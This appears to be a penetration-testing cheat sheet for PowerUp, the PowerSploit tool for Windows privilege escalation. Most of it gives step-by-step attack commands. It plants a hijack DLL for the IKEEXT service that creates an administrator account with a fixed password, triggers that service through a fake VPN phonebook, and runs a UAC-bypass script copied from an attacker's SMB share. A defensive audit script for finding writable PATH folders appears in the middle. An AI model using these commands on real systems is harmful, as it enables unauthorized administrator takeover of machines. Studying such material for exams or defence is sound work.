PowerUp

PowerUp is part of PowerSploit and of the PowerShell Empire framework. It aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

💡 Officially allowed during the OSCP exam according to the OSCP Exam FAQ (part of PowerShell Empire, which is allowed).

Location

Upload to the victim machine. See File Transfer.

/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

Usage

powershell -exec bypass
Import-Module .\PowerUp.ps1

Execute all checks

Outputs any identified vulnerabilities along with the corresponding abuse functions. The -HTMLReport flag also writes a COMPUTER.username.html version of the report.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks | Out-String -Width 4096}"
Invoke-AllChecks | Out-String -Width 4096
Invoke-AllChecks -HTMLReport

DLL Hijacking

Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>] [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]
Write-HijackDll -DllPath 'C:\Users\<somepath>\<somedll>.dll'

wlbsctrl.dll

Vulnerability in the IKEEXT service. A Windows program looks for DLLs when it starts. If one of these DLLs does not exist, it is possible to escalate privileges by placing a malicious DLL in the location where the application looks for it.

sc query IKEEXT

Write the missing DLL

Write the missing DLL wlbsctrl.dll and restart the IKEEXT service. Use the DLL path from the Invoke-AllChecks output.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-HijackDll -DllPath '<somepath>\wlbsctrl.dll'}"
powershell
Import-Module .\PowerUp.ps1
Write-HijackDll -DllPath 'C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

The debug.bat script creates a local administrator user (john / Password123!).

cd C:\Users\<username>\AppData\Local\Microsoft\WindowsApps
type debug.bat

Restarting the IKEEXT service

Option 1: restart the service

net stop IKEEXT
net start IKEEXT

Option 2: reboot

shutdown /r

Option 3: use rasdial

Attempting an IKEv2 VPN connection makes svchost.exe start the IKEEXT service, which then looks for the wlbsctrl.dll file.

Create this file:

C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\rasphone.pbk
[IKEEXT]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

Use rasdial with the following command to connect to the dummy VPN entry.

rasdial IKEEXT test test /PHONEBOOK:rasphone.pbk

Verify that the exploit succeeded: the john user should now be a member of the Administrators group.

net localgroup administrators
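The condition the wlbsctrl.dll hijack above relies on is a directory in the DLL search path that a standard user can write to and that does not already contain the DLL. The following PowerShell audit script is an added example, not part of PowerUp or of the original notes; it measures that exposure from the defender's side. It assumes it is run as the standard user whose exposure you want to check, and the function name Test-DirectoryWritable and the $dllName variable are my own.

```powershell
# Added audit example (not PowerUp code): report PATH directories that a standard
# user can write to and whether wlbsctrl.dll is already present in them.
# Assumption: run as the low-privileged user being assessed.

$dllName = 'wlbsctrl.dll'

# IKEEXT set to Manual start is what makes an on-demand trigger (e.g. a VPN
# connection attempt) relevant; report state and start mode for the record.
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='IKEEXT'"
"IKEEXT state: $($svc.State), start mode: $($svc.StartMode)"

function Test-DirectoryWritable {
    param([string]$Path)
    # Create and delete a zero-byte probe file. Inspecting the ACL alone misses
    # deny entries and inherited rights, so an actual write attempt is more reliable.
    $probe = Join-Path $Path ('acl-probe-' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

# Directories on the current user's PATH (system PATH plus user PATH, as merged by Windows).
$dirs = ($env:Path -split ';') |
    Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Container) } |
    Select-Object -Unique

foreach ($dir in $dirs) {
    $dllPath    = Join-Path $dir $dllName
    $dllPresent = Test-Path -LiteralPath $dllPath
    $writable   = Test-DirectoryWritable -Path $dir

    # If a copy of the DLL is already there, record its signature status so an
    # unsigned or invalidly signed file stands out during review.
    $sigStatus = $null
    if ($dllPresent) {
        $sigStatus = (Get-AuthenticodeSignature -FilePath $dllPath).Status
    }

    [pscustomobject]@{
        Directory  = $dir
        Writable   = $writable
        DllPresent = $dllPresent
        Signature  = $sigStatus
        # A writable PATH entry without the DLL is the exposure Invoke-AllChecks reports.
        Exposed    = ($writable -and -not $dllPresent)
    }
}
```

Any row with Exposed = True corresponds to a finding PowerUp would raise; the usual fixes are to remove user-writable directories (such as per-user WindowsApps folders) from the system-wide PATH, or to tighten their ACLs so only administrators can create files there. A row with DllPresent = True and a Signature other than Valid deserves a closer look, since Windows does not ship wlbsctrl.dll in those locations.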

Invoke-WScriptBypassUAC.ps1

Official Documentation.

Did not work (was not applicable to target tested).

cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 /home/kali/share
copy \\x.x.x.x\myshare\Invoke-WScriptBypassUAC.ps1 Invoke-WScriptBypassUAC.ps1
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
# powershell.exe -exec bypass
.\Invoke-WScriptBypassUAC.ps1 -Command cmd.exe